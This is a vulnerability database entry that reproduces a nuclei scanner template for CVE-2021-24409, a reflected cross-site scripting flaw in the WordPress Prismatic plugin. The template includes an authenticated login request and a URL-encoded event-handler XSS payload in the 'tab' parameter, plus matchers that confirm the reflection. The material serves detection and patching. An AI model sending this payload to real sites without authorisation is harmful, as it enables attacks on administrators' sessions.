Lucene search
K

Prismatic < 2.8 - Cross-Site Scripting

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

Prismatic plugin < 2.8 - Reflected Cross-Site Scriptin

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress 插件跨站脚本漏洞
12 Jul 202100:00
cnnvd
CNVD
WordPress Plugin Cross-Site Scripting Vulnerability (CNVD-2021-59594)
14 Jul 202100:00
cnvd
CVE
CVE-2021-24409
12 Jul 202119:20
cve
Cvelist
CVE-2021-24409 Prismatic < 2.8 - Reflected Cross-Site Scripting (XSS)
12 Jul 202119:20
cvelist
NVD
CVE-2021-24409
12 Jul 202120:15
nvd
OSV
CVE-2021-24409
12 Jul 202120:15
osv
Patchstack
WordPress Prismatic plugin <= 2.7 - Reflected Cross-Site Scripting (XSS) vulnerability
21 Jun 202100:00
patchstack
Prion
Cross site scripting
12 Jul 202120:15
prion
RedhatCVE
CVE-2021-24409
22 May 202518:24
redhatcve
wpexploit
Prismatic < 2.8 - Reflected Cross-Site Scripting (XSS)
21 Jun 202100:00
wpexploit
Rows per page
id: CVE-2021-24409

info:
  name: Prismatic < 2.8 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking.
  remediation: Fixed in version 2.8
  reference:
    - https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24409
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24409
    cwe-id: CWE-79
    epss-score: 0.01793
    epss-percentile: 0.7573
    cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: plugin-planet
    product: prismatic
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/prismatic
    fofa-query: body=/wp-content/plugins/prismatic
    publicwww-query: "/wp-content/plugins/prismatic"
  tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "Leave A Review?")'
          - 'contains(body_2, "onanimationend=alert(document.domain)")'
        condition: and
# digest: 490a0046304402200766ebc46c03b3319329917a91d8eb63472df390f3f6a2cede63100b967fc62002205002d3b713e08497fbe69b54a602c3da9083caa2b503bd6bef91cbf5da80fa0d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.1
EPSS0.01793
27